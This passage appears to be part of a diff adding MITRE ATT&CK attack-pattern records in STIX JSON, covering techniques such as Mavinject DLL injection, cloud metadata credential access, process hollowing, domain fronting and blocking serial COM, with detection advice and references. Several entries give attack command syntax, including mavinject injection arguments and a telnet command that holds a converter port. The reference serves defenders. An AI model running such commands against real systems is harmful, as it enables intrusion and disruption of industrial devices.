(2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf" + }, + { + "source_name": "Lau 2011", + "description": "Lau, H. (2011, August 8). Are MBR Infections Back in Fashion? (Infographic). Retrieved November 13, 2014.", + "url": "http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Data from Removable Media", + "description": "Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. \n\nSome adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "William Cain" + ], + "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a system's connected removable media. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "Privileges to access removable media drive and files" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec", + "created": "2017-05-31T21:30:31.584Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1025", + "external_id": "T1025" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Code Signing", + "description": "Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) However, adversaries are known to use code signing certificates to masquerade malware and tools as legitimate binaries (Citation: Janicab). The certificates used during an operation may be created, forged, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates)\n\nCode signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)\n\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Windows User Account Control" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1b84d551-6de8-4b96-9930-d177677c3b1d", + "created": "2017-05-31T21:31:26.474Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1116", + "external_id": "T1116" + }, + { + "source_name": "Wikipedia Code Signing", + "description": "Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016.", + "url": "https://en.wikipedia.org/wiki/Code_signing" + }, + { + "source_name": "Janicab", + "description": "Thomas. (2013, July 15). New signed malware called Janicab. Retrieved July 17, 2017.", + "url": "http://www.thesafemac.com/new-signed-malware-called-janicab/" + }, + { + "source_name": "Securelist Digital Certificates", + "description": "Ladikov, A. (2015, January 29). Why You Shouldn’t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016.", + "url": "https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/" + }, + { + "source_name": "Symantec Digital Certificates", + "description": "Shinotsuka, H. (2013, February 22). How Attackers Steal Private Keys from Digital Certificates. Retrieved March 31, 2016.", + "url": "http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Mavinject", + "description": "Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)\n\nAdversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. C:\\Windows\\system32\\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. \n\nIn addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor the execution and arguments of mavinject.exe. Compare recent invocations of mavinject.exe with prior history of known good arguments and injected DLLs to determine anomalous and potentially adversarial activity.\n\nAdversaries may rename abusable binaries to evade detections, but the argument INJECTRUNNING is required for mavinject.exe to perform [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001) and may therefore be monitored to alert malicious activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1bae753e-8e52-4055-a66d-2ead90303ca9", + "created": "2021-09-22T17:45:10.241Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/013", + "external_id": "T1218.013" + }, + { + "source_name": "ATT Lazarus TTP Evolution", + "description": "Fernando Martinez. (2021, July 6). Lazarus campaign TTPs and evolution. Retrieved September 22, 2021.", + "url": "https://cybersecurity.att.com/blogs/labs-research/lazarus-campaign-ttps-and-evolution" + }, + { + "source_name": "LOLBAS Mavinject", + "description": "LOLBAS. (n.d.). Mavinject.exe. Retrieved September 22, 2021.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Mavinject/" + }, + { + "source_name": "Mavinject Functionality Deconstructed", + "description": "Matt Graeber. (2018, May 29). mavinject.exe Functionality Deconstructed. Retrieved September 22, 2021.", + "url": "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e" + }, + { + "source_name": "Reaqta Mavinject", + "description": "Reaqta. (2017, December 16). From False Positive to True Positive: the story of Mavinject.exe, the Microsoft Injector. Retrieved September 22, 2021.", + "url": "https://reaqta.com/2017/12/mavinject-microsoft-injector/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Cloud Instance Metadata API", + "description": "Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.\n\nMost cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API)\n\nIf adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)\n\nThe de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254.\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Praetorian" + ], + "x_mitre_detection": "* Monitor access to the Instance Metadata API and look for anomalous queries.\n* It may be possible to detect adversary use of credentials they have obtained. See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.\n", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1c2fd73a-e634-44ed-b1b5-9e7cf7404e9f", + "created": "2019-09-04T14:41:32.317Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1522", + "external_id": "T1522" + }, + { + "source_name": "AWS Instance Metadata API", + "description": "AWS. (n.d.). Instance Metadata and User Data. Retrieved July 18, 2019.", + "url": "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html" + }, + { + "source_name": "RedLock Instance Metadata API 2018", + "description": "Higashi, Michael. (2018, May 15). Instance Metadata API: A Modern Day Trojan Horse. Retrieved July 16, 2019.", + "url": "https://redlock.io/blog/instance-metadata-api-a-modern-day-trojan-horse" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Process Hollowing", + "description": "Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis. (Citation: Leitch Hollowing) (Citation: Elastic Process Injection July 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitoring API calls may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. API calls that unmap process memory, such as ZwUnmapViewOfSection or NtUnmapViewOfSection, and those that can be used to modify memory within another process, such as WriteProcessMemory, may be used for this technique. (Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Process whitelisting", + "Whitelisting by file name or path", + "Signature-based detection", + "Anti-virus" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1c338d0f-a65e-4073-a5c1-c06878849f21", + "created": "2017-05-31T21:31:09.815Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1093", + "external_id": "T1093" + }, + { + "source_name": "Leitch Hollowing", + "description": "Leitch, J. (n.d.). Process Hollowing. Retrieved November 12, 2014.", + "url": "http://www.autosectools.com/process-hollowing.pdf" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Local Data Staging", + "description": "Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.\n\nAdversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Massimiliano Romano, BT Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nConsider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", + "created": "2020-03-13T21:13:10.467Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1074/001", + "external_id": "T1074.001" + }, + { + "source_name": "Prevailion DarkWatchman 2021", + "description": "Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022.", + "url": "https://www.prevailion.com/darkwatchman-new-fileless-techniques/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:00.184Z", + "name": "Block Serial COM", + "description": "Adversaries may block access to serial COM to prevent instructions or configurations from reaching target devices. Serial Communication ports (COM) allow communication with control system devices. Devices can receive command and configuration messages over such serial COM. Devices also use serial COM to send command and reporting messages. Blocking device serial COM may also block command messages and block reporting messages. \n\nA serial to Ethernet converter is often connected to a serial COM to facilitate communication between serial and Ethernet devices. One approach to blocking a serial COM would be to create and hold open a TCP session with the Ethernet side of the converter. A serial to Ethernet converter may have a few ports open to facilitate multiple communications. For example, if there are three serial COM available -- 1, 2 and 3 --, the converter might be listening on the corresponding ports 20001, 20002, and 20003. If a TCP/IP connection is opened with one of these ports and held open, then the port will be unavailable for use by another party. One way the adversary could achieve this would be to initiate a TCP session with the serial to Ethernet converter at 10.0.0.1 via Telnet on serial port 1 with the following command: telnet 10.0.0.1 20001.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Operational Databases: Process/Event Alarm", + "Network Traffic: Network Traffic Flow", + "Operational Databases: Process History/Live Data", + "Application Log: Application Log Content", + "Process: Process Termination" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0805", + "external_id": "T0805" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-14T21:12:48.409Z", + "name": "Match Legitimate Name or Location", + "description": "Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.\n\nAdversaries may also use the same icon of the file they are trying to mimic.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Yossi Weizman, Azure Defender Research Team", + "Vishwas Manral, McAfee" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.\n\nIf file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)\n\nIn containerized environments, use image IDs and layer hashes to compare images instead of relying only on their names.(Citation: Docker Images) Monitor for the unexpected creation of new resources within your cluster in Kubernetes, especially those created by atypical users.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Containers" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application Control" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", + "created": "2020-02-10T20:43:10.239Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1036/005", + "external_id": "T1036.005" + }, + { + "source_name": "Twitter ItsReallyNick Masquerading Update", + "description": "Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019.", + "url": "https://twitter.com/ItsReallyNick/status/1055321652777619457" + }, + { + "source_name": "Docker Images", + "description": "Docker. (n.d.). Docker Images. Retrieved April 6, 2021.", + "url": "https://docs.docker.com/engine/reference/commandline/images/" + }, + { + "source_name": "Elastic Masquerade Ball", + "description": "Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.", + "url": "https://www.elastic.co/blog/how-hunt-masquerade-ball" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-08T18:57:58.010Z", + "name": "System Binary Proxy Execution", + "description": "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system. (Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands. Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands. (Citation: split man page)(Citation: GTFO split)\n\nAdversaries may abuse application binaries installed on a system for proxy execution of malicious code or domain-specific commands. These commands could be used to target local resources on the device or networked devices within the environment through defined APIs ([Execution through API](https://attack.mitre.org/techniques/T0871)) or application-specific programming languages (e.g., MicroSCADA SCIL). Application binaries may be signed by the developer or generally trusted by the operators, analysts, and monitoring tools accustomed to the environment. These applications may be developed and/or directly provided by the device vendor to enable configuration, management, and operation of their devices without many alternatives. \n\nAdversaries may seek to target these trusted application binaries to execute or send commands without the development of custom malware. For example, adversaries may target a SCADA server binary which has the existing ability to send commands to substation devices, such as through IEC 104 command messages. Proxy execution may still require the development of custom tools to hook into the application binary’s execution.\n\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Script: Script Execution", + "Command: Command Execution", + "Process: Process Creation" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1c5cf58c-a34a-40d7-82f4-f987cdfc2b91", + "created": "2024-03-25T20:16:15.016Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0894", + "external_id": "T0894" + }, + { + "source_name": "GTFO split", + "description": "GTFOBins. (2020, November 13). split. Retrieved April 18, 2022.", + "url": "https://gtfobins.github.io/gtfobins/split/" + }, + { + "source_name": "LOLBAS Project", + "description": "Oddvar Moe et al. (2022, February). Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.", + "url": "https://github.com/LOLBAS-Project/LOLBAS#criteria" + }, + { + "source_name": "split man page", + "description": "Torbjorn Granlund, Richard M. Stallman. (2020, March null). split(1) — Linux manual page. Retrieved March 25, 2022.", + "url": "https://man7.org/linux/man-pages/man1/split.1.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Domain Fronting", + "description": "Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) The technique involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, \"domainless\" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).\n\nFor example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Matt Kelly, @breakersall" + ], + "x_mitre_detection": "If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blacklist or whitelist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1ce03c65-5946-4ac9-9d4d-66db87e024bd", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1172", + "external_id": "T1172" + }, + { + "source_name": "Fifield Blocking Resistent Communication through domain fronting 2015", + "description": "David Fifield, Chang Lan, Rod Hynes, Percy Wegmann, and Vern Paxson. (2015). Blocking-resistant communication through domain fronting. Retrieved November 20, 2017.", + "url": "http://www.icir.org/vern/papers/meek-PETS-2015.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Digital Certificates", + "description": "Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).\n\nAdversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)).\n\nAfter creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)\n\nDetection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1cec9319-743b-4840-bb65-431547bce82a", + "created": "2020-10-01T01:42:24.974Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1587/003", + "external_id": "T1587.003" + }, + { + "source_name": "Splunk Kovar Certificates 2017", + "description": "Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL Certificates. Retrieved October 16, 2020.", + "url": "https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Stored Data Manipulation", + "description": "Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", 